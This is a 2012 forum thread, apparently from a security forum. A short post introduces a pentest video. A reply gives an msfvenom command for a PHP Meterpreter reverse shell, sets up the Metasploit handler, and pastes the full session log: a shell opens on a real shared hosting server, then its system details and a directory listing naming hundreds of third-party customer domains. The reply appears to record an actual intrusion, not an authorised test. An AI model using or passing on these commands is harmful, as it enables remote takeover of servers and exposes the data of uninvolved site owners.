Guest Kovalski Posted October 26, 2012 Report Posted October 26, 2012 This time I am going to show you a segment from a security assessment I did recently. It was mostly for practice and also to help out a friend's company to increase his defense. For obvious reasons, the company's name, IP addresses, etc. have all been left out purposefully. Although this wasn't a commercial-grade pentest by professionals -- remember, I'm still just a college student -- I would like to think of myself as successful for pointing out flaws that could lead to full compromise. Sursa YouTube. Quote
neo.hapsis Posted October 27, 2012 Report Posted October 27, 2012 Multumesc pentru tutorial!Am folosit urmatoarea comanda pentru crearea shellului phpmsfvenom -p php/meterpreter/reverse_tcp LHOST=xxxxxxx LPORT=443 -e php/base64 -f raw > shell.phpCind le-a creat nu le va executa ca lipseste tagurile <?php si la sfarsit ?>In rest merge perfect.INCA ODATA MULTUMESC!msfconsole -nuse exploit/multi/handlerset PAYLOAD php/meterpreter/reverse_tcpset LHOST 0.0.0.0set LPORT 443exploitmsf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcpPAYLOAD => php/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 0.0.0.0LHOST => 0.0.0.0msf exploit(handler) > set LPORT 443LPORT => 443msf exploit(handler) > exploit[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...[*] Sending stage (39217 bytes) to 195.234.171.250[*] Meterpreter session 1 opened (xxxxxx:443 -> 195.234.171.250:50028) at 2012-10-27 17:39:08 +0200meterpreter > shellProcess 2133 created.Channel 0 created.uname -aLinux lin12.wmghosting.net 2.6.32-220.2.1.el6.centos.plus.x86_64 #1 SMP Thu Dec 22 23:32:31 GMT 2011 x86_64 x86_64 x86_64 GNU/Linuxiduid=10257(hpfc) gid=505(psacln) groups=505(psacln)ls -altotal 360drwxrwxrwx 9 hpfc psacln 4096 Oct 27 17:33 .drwxr-xr-x 20 hpfc psacln 4096 Sep 3 2010 ..-rw-r--r-- 1 hpfc psacln 68590 Oct 26 22:28 404.phpdrwxrwxrwx 2 hpfc psacln 4096 Mar 10 2010 M_images-rwxrwxrwx 1 hpfc psacln 1352 Mar 10 2010 apply_f2.png-rwxrwxrwx 1 hpfc psacln 1648 Mar 10 2010 archive_f2.png-rw-r--r-- 1 hpfc psacln 5741 Mar 31 2010 attrezzatura.jpg-rwxrwxrwx 1 hpfc psacln 1620 Mar 10 2010 back_f2.pngdrwxrwxrwx 2 hpfc psacln 4096 Mar 10 2010 banners-rwxrwxrwx 1 hpfc psacln 151 Mar 10 2010 blank.png-rwxrwxrwx 1 hpfc psacln 65986 Mar 24 2010 bolentino.jpg-rwxrwxrwx 1 hpfc psacln 564 Mar 10 2010 cancel.png-rwxrwxrwx 1 hpfc psacln 1457 Mar 10 2010 cancel_f2.pngdrwxrwxrwx 4 apache apache 4096 Aug 23 09:21 comprofiler-rwxrwxrwx 1 hpfc psacln 1776 Mar 10 2010 css_f2.png-rwxrwxrwx 1 hpfc psacln 1719 Mar 10 2010 edit_f2.pngdrwxr-xr-x 7 apache apache 4096 Apr 13 2010 fbfiles-rwxrwxrwx 1 hpfc psacln 1744 Mar 10 2010 html_f2.png-rwxrwxrwx 1 hpfc psacln 44 Mar 10 2010 index.html-rw-r--r-- 1 hpfc psacln 5048 Mar 31 2010 itinerari.jpg-rwxrwxrwx 1 hpfc psacln 7200 Mar 10 2010 joomla_logo_black.jpg-rw-r--r-- 1 hpfc psacln 48566 Apr 19 2010 logo.jpg-rwxrwxrwx 1 hpfc psacln 190 Mar 10 2010 menu_divider.png-rwxrwxrwx 1 hpfc psacln 1655 Mar 10 2010 new_f2.pngdrwxr-xr-x 4 apache apache 4096 Mar 22 2010 phocagallery-rwxrwxrwx 1 hpfc psacln 2560 Mar 10 2010 powered_by.png-rw-r--r-- 1 hpfc psacln 4722 Mar 31 2010 prede.jpg-rwxrwxrwx 1 hpfc psacln 1699 Mar 10 2010 preview_f2.png-rwxrwxrwx 1 hpfc psacln 1800 Mar 10 2010 publish_f2.png-rwxrwxrwx 1 hpfc psacln 698 Mar 10 2010 save.png-rwxrwxrwx 1 hpfc psacln 1822 Mar 10 2010 save_f2.png-rw-r--r-- 1 hpfc psacln 1796 Oct 27 17:33 shell.phpdrwxrwxrwx 2 hpfc psacln 4096 Mar 31 2010 smilies-rwxrwxrwx 1 hpfc psacln 202 Mar 10 2010 sort_asc.png-rwxrwxrwx 1 hpfc psacln 201 Mar 10 2010 sort_desc.pngdrwxrwxrwx 4 hpfc psacln 4096 Mar 22 2011 stories-rw-r--r-- 1 hpfc psacln 5138 Mar 31 2010 terminali.jpg-rwxrwxrwx 1 hpfc psacln 1525 Mar 10 2010 unarchive_f2.png-rwxrwxrwx 1 hpfc psacln 1679 Mar 10 2010 unpublish_f2.png-rwxrwxrwx 1 hpfc psacln 1658 Mar 10 2010 upload_f2.pngcd /usr/local/psa/home/vhosts/ls -altotal 11752drwxr-xr-x. 370 root root 20480 Oct 9 14:04 .drwxr-xr-x. 3 root root 4096 Sep 15 2011 ..-rw-r--r-- 1 root root 10485760 Jan 16 2012 .fs_gy9nNHdrwxr-xr-x. 3 root root 4096 Sep 15 2011 .skeldrwxr-xr-x 14 root root 4096 Jan 23 2012 4colori.comdrwxr-xr-x 20 root root 4096 Feb 24 2012 DEROSASRL.NETdrwxr-xr-x 14 root root 4096 Jan 16 2012 acsantambrogio.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 aetheria.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 agescimonteforteirpino1.orgdrwxr-xr-x 14 root root 4096 Jan 16 2012 agrecineti.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 agri-world.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 aiisa.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 aiutopsicologico.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 albergosansevero.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 alessandroscasseddu.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 almersrl.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 alzheimersr.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 amgaudenziodelloca.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 andreacostantino.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 angelocastronovo.itdrwxr-xr-x 14 root root 4096 Jun 4 20:32 angeloerrico.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 anticapietra.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 antoniocolonna.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 antoniodambrosio.comdrwxr-xr-x 12 root root 4096 Aug 28 10:53 archicons.comdrwxr-xr-x 12 root root 4096 Aug 28 11:03 archiconsengineering.comdrwxr-xr-x 21 root root 4096 Jan 17 2012 architettoragusa.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 architetturaperilpaesaggio.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 ardoconsulting.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 arenainfortunistica.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ariavip.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 arnotik.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 arredamentilineaeffe.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 arrischianti.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 arteotticasrl.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 artimedia.orgdrwxr-xr-x 21 root root 4096 Jan 16 2012 asgsrl.netdrwxr-xr-x 10 root root 4096 Jan 23 2012 assdontoninobello.caritasavellino.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 assiafotovideo.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 automary.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 autoscuolasciccone.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 avitaia.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 bardellafunivia.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 basilicatalive.netdrwxr-xr-x 14 root root 4096 Jan 16 2012 bassottisperanza.comdrwxr-xr-x 14 root root 4096 Jan 31 2012 baysite.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 bbnapoli.bizdrwxr-xr-x 14 root root 4096 Jan 23 2012 beautystarlux.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 bellablutaormina.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 bia.itdrwxr-xr-x 20 root root 4096 Feb 24 2012 blanco.traveldrwxr-xr-x 10 root root 4096 Jun 4 20:32 blog.angeloerrico.comdrwxr-xr-x 10 root root 4096 Jan 23 2012 blog.formatdental.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 boccadifuocotravel.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 bordercafe.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 bsidestore.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 buttiamocilatini.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 bysala.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 caffemediterraneo.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 caldito.bizdrwxr-xr-x 21 root root 4096 Jan 23 2012 caritasavellino.itdrwxr-xr-x 20 root root 4096 Feb 24 2012 carlottabrusini.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 cavalcalupi.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 cavpinerolo.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ccbm.itdrwxr-xr-x 10 root root 4096 Jan 23 2012 cdababele.caritasavellino.itdrwxr-xr-x 10 root root 4096 Jan 23 2012 cdazaccheo.caritasavellino.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 cedisweb.itdrwxr-xr-x 12 root root 4096 Aug 31 15:47 cemmusica.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 cerullomoto.comdrwxr-xr-x 20 root root 4096 Feb 24 2012 chezsife.itdrwxr-xr-x 20 root root 4096 Feb 27 2012 chiaroscurosrl.itdrwxr-xr-x. 10 root root 4096 Sep 15 2011 chrootdrwxr-xr-x 14 root root 4096 Jan 23 2012 cittaitaliane.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 claudiofayer.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 clubdellabellezza.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 comesaimpianti.itdrwxr-xr-x 10 root root 4096 Jan 23 2012 confcom.cittaitaliane.comdrwxr-xr-x 21 root root 4096 Jan 30 2012 consorziomose.comdrwxr-xr-x 13 root root 4096 Feb 28 2012 consumatoripuglia.itdrwxr-xr-x 10 root root 4096 Jan 16 2012 contacts.pierremenard.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 coopfly.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 cosmosdistribuzione.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 countryinitaly.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 crearecasa.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 cristinavasile.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 crubaviaggi.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 cucinegiordano.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 cupidopark.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 curge.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 dagrandenonvogliofareilcalciatore.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 danzaorientale.netdrwxr-xr-x 14 root root 4096 Jan 16 2012 davidezampaglione.comdrwxr-xr-x. 5 root root 4096 Nov 1 2011 defaultdrwxr-xr-x 14 root root 4096 Jan 23 2012 dianadesimone.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 diciottosrl.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 didisrl.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 difalcoservice.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 dimorestorichepuglia.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 dipalmafinearts.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 discocaligola.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 dmimmobiliare.bizdrwxr-xr-x 21 root root 4096 Jan 23 2012 dontb.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 dottorvergata.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 dramsrl.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 driinspot.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 ecogest-risparmio.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 edilfutura.orgdrwxr-xr-x 14 root root 4096 Jan 16 2012 edspec.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 elhombredelsaco.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 elitestar.infodrwxr-xr-x 21 root root 4096 Feb 28 2012 elitestar.itdrwxr-xr-x 21 root root 4096 Jan 30 2012 ellonet.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 elvirarovito.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 emanuelalaurenti.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 enzomontanero.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 erossexyshop.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 essenceline.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 essequadro.bizdrwxr-xr-x 14 root root 4096 Jan 23 2012 esteticaunisex.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 ete-italy.comdrwxr-xr-x 14 root root 4096 Jan 16 2012 eurispes.sicilia.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 euroarpet.comdrwxr-xr-x 10 root root 4096 Jan 16 2012 fantacalcio.ninarello.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 fantaverdi.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 fdmultiservice.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 femmineva.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 ferrariauto.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 ferrodarte.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 festasorpresa.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 festivalmediterraneo.netdrwxr-xr-x 21 root root 4096 Jan 23 2012 fiepiemonte.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 foinikos.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 folliemozioni.comdrwxr-xr-x 10 root root 4096 Jan 23 2012 fondazioneopussolidarietatispax.caritasavellino.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 fondazionepidurso.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 foodandcare.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 formatdental.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 francescanobile.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 francescolopes.itdrwxr-xr-x 13 root root 4096 Feb 28 2012 fratelliurciuolo.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 frattervalter.itdrwxr-xr-x. 7 root root 4096 Sep 15 2011 fsdrwxr-xr-x. 2 root root 4096 Sep 15 2011 fs-passwddrwxr-xr-x 14 root root 4096 Jan 16 2012 gardaeventi.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 gastronomiaecatering.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 gefis.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 gespisrl.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 giannia.netdrwxr-xr-x 14 root root 4096 Jan 16 2012 giessesrl.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 giordangomme.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 giovannimolettieri.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 giovannimunitto.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 giuliaboari.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 glgmaremania.itdrwxr-xr-x 20 root root 4096 Feb 27 2012 glieubeiresidence.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 glutenfreestore.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 gmarreda.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 gmgassociati.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 goldparadiseresort.comdrwxr-xr-x 12 root root 4096 Aug 24 16:31 golpeinaltoadige.comdrwxr-xr-x 21 root root 4096 Jan 16 2012 gprsrl.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 gruppoautomary.itdrwxr-xr-x 14 root root 4096 Jan 16 2012 gruppocomauto.itdrwxr-xr-x 21 root root 4096 Jan 18 2012 gruppogespi.comdrwxr-xr-x 20 root root 4096 Feb 24 2012 gruppogiordano.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 holdingproject.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 hostingeuropeo.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 hotel-circe.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 hotelcirce.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 hotilproibito.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 hpfc.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 ibrcostruzioni.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 idealnoleggio.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 idmcostruzioni.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 idmcostruzioni.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ielitromobili.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 ihp.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ilben-essere.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ilfarodonna.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 ilparadisodelpc.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 ilrifugiodelnonno.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 imaginariafilmfestival.orgdrwxr-xr-x 13 root root 4096 Feb 24 2012 imaplast.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 impiantifotovoltaicinapoli.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 incupatrance.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 infabula.itdrwxr-xr-x 14 root root 4096 Jan 23 2012 informania.itdrwxr-xr-x 20 root root 4096 Feb 24 2012 internationalpalchi.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 iperbolecafe.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 irpiniacolor.itdrwxr-xr-x 13 root root 4096 Feb 28 2012 istitutogreengarden.bizdrwxr-xr-x 14 root root 4096 Jan 23 2012 ivisconti.netdrwxr-xr-x 13 root root 4096 Feb 28 2012 jepsondj.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 k2cconsulting.comdrwxr-xr-x 14 root root 4096 Jan 23 2012 kalaonda.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 kukuabeach.itdrwxr-xr-x 12 root root 4096 Aug 24 16:30 labottegadellusato.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 ladisaristorazione.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 lafontedelformaggio.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 latiweb.eudrwxr-xr-x 14 root root 4096 Jan 17 2012 latorredelsalento.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 laurabove.itdrwxr-xr-x 13 root root 4096 Feb 28 2012 ldbitalia.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 leonessadipuglia.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 lesposedisusy.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 libreriagovi.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 liccumie.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 liltsiracusa.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 logosverbum.comdrwxr-xr-x 21 root root 4096 Jan 30 2012 lorussoimpianti.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 lubrifilter.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 lucadandrea.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 lucapalino.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 lucarelliesega.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 luxartservicesarl.itdrwxr-xr-x 10 root root 4096 Jan 16 2012 madamejulie.giuliaboari.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 magistersound.itdrwxr-xr-x 10 root root 4096 Jan 18 2012 mail.edspec.itdrwxr-xr-x 10 root root 4096 Jan 23 2012 mail.pcalivepec.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 maiortech.comdrwxr-xr-x 10 root root 4096 Jan 16 2012 maison.pierremenard.comdrwxr-xr-x 21 root root 4096 Jan 16 2012 maniacehotel.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 manuelamariani.comdrwxr-xr-x 20 root root 4096 Feb 27 2012 marchionna.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 marcoevalentina.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 marcozaccaria.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 marinesystem.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 matikservice.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 mattinzoli.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 mayner.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 mdm-group.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 mealisa.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 metalmatic.eudrwxr-xr-x 14 root root 4096 Jan 24 2012 metalmatic.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 metalmaticsrl.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 mikadryanimaetnica.comdrwxr-xr-x 12 root root 4096 Aug 24 16:29 minnitimauro.itdrwxr-xr-x 10 root root 4096 Jan 16 2012 mipiaceviaggiare.unsorriso.eudrwxr-xr-x 14 root root 4096 Jan 24 2012 mitedivendicari.itdrwxr-xr-x 20 root root 4096 Feb 24 2012 modawebstore.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 moiremusic.itdrwxr-xr-x 21 root root 4096 Jan 24 2012 montecarrubo.comdrwxr-xr-x 21 root root 4096 Jan 16 2012 montecristoforex.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 motoclubduesicilie.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 namaskarcooperativa.itdrwxr-xr-x 21 root root 4096 Jan 16 2012 napeetransport.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 natalissimofiera.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 naturare.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 naturastudio.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 newenergynet.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 nicolacasini.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 ninarello.itdrwxr-xr-x 10 root root 4096 Jan 16 2012 ninarello.ninarello.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 ninocco.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 ninocco.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 njlaya.itdrwxr-xr-x 21 root root 4096 Jan 30 2012 norbasystem.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 notolibera.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 nunziograssia.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 nuovoordinemondiale.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 obp.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 olimpicapompei.comdrwxr-xr-x 14 root root 4096 Jan 31 2012 oralweb.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 origanodelbarone.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 otticamarzano.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 palalive.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 palestragymnika.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 partenioservice.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 partenopeaponteggi.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 passionsex.netdrwxr-xr-x 14 root root 4096 Jan 24 2012 passionsexyshop.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 pastoremarmi.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 pcalive.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 pcalivepec.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 pecgruppogespi.comdrwxr-xr-x 14 root root 4096 Jan 31 2012 pechef.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 perrottabus.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 pianuratravel.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 pierremenard.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 pietredicristallo.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 plasticitalia.itdrwxr-xr-x 20 root root 4096 Feb 27 2012 polarpads.netdrwxr-xr-x 14 root root 4096 Jan 31 2012 polvilladoro.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 portalenapoli.netdrwxr-xr-x 14 root root 4096 Jan 24 2012 pra-ma.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 primaeventi.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 professionalights.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 publi-tech.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 pvolpedesign.comdrwxr-xr-x 20 root root 4096 Feb 24 2012 realsiracusa.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 redibronzo.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 reggimentocarri.orgdrwxr-xr-x 21 root root 4096 Jan 23 2012 renautlet.itdrwxr-xr-x 10 root root 4096 Jan 16 2012 revisioni.ninarello.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 ricamatrimoni.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 ricamusic.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 riderstoresrl.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 riparazioniserrande.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 ristorantedelcorso.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 ristorantemustafa.netdrwxr-xr-x 14 root root 4096 Jan 31 2012 rocknroad.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 royalword.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 salaprovenapoli.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 salvatorevasilefotografo.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 salvatricemotta.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 sampaoli.itdrwxr-xr-x 21 root root 4096 Jan 17 2012 sce-group.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 scuoladipesca.netdrwxr-xr-x 14 root root 4096 Jan 24 2012 scuolapresicce.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sfiziosi.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sianoottica.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sintaxbyledilnova.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 siracusanord.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sirhatour.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 sirma.orgdrwxr-xr-x 14 root root 4096 Jan 17 2012 skizzidimare.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 skyfast.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 smfotografo.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 soccorsopediatrico.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 soniafreda.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sposiintv.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 sscotti.bizdrwxr-xr-x 14 root root 4096 Jan 31 2012 stelladamore.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 streetboard.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 studiobrancati.orgdrwxr-xr-x 21 root root 4096 Jan 23 2012 studiocoletta.itdrwxr-xr-x 21 root root 4096 Jan 30 2012 studiocoletta.netdrwxr-xr-x 21 root root 4096 Jan 23 2012 studiocommercialedemarco.itdrwxr-xr-x 21 root root 4096 Jan 23 2012 studiodidonna.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 studioiezza.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 studiolegaleconsiglio.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 studioriccobene.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 studioymproject.netdrwxr-xr-x 14 root root 4096 Jan 24 2012 studiozavarese.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 studiregistrazionecampania.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 studiregistrazionenapoli.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 stuzzicamente.itdrwxr-xr-x 14 root root 4096 Jan 24 2012 suertetour.comdrwxr-xr-x 14 root root 4096 Jan 24 2012 taniservice.comdrwxr-xr-x 14 root root 4096 Jan 17 2012 tarantularubra.itdrwxr-xr-x 14 root root 4096 Jan 31 2012 taurusimmobiliare.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 teatroforsennato.comdrwxr-xr-x 21 root root 4096 Jan 23 2012 tecimpianti.itdrwxr-xr-x 12 root root 4096 Jun 20 12:21 telefonomania.itdrwxr-xr-x 14 root root 4096 Jan 17 2012 temarestaurant.itdrwxr-xr-x 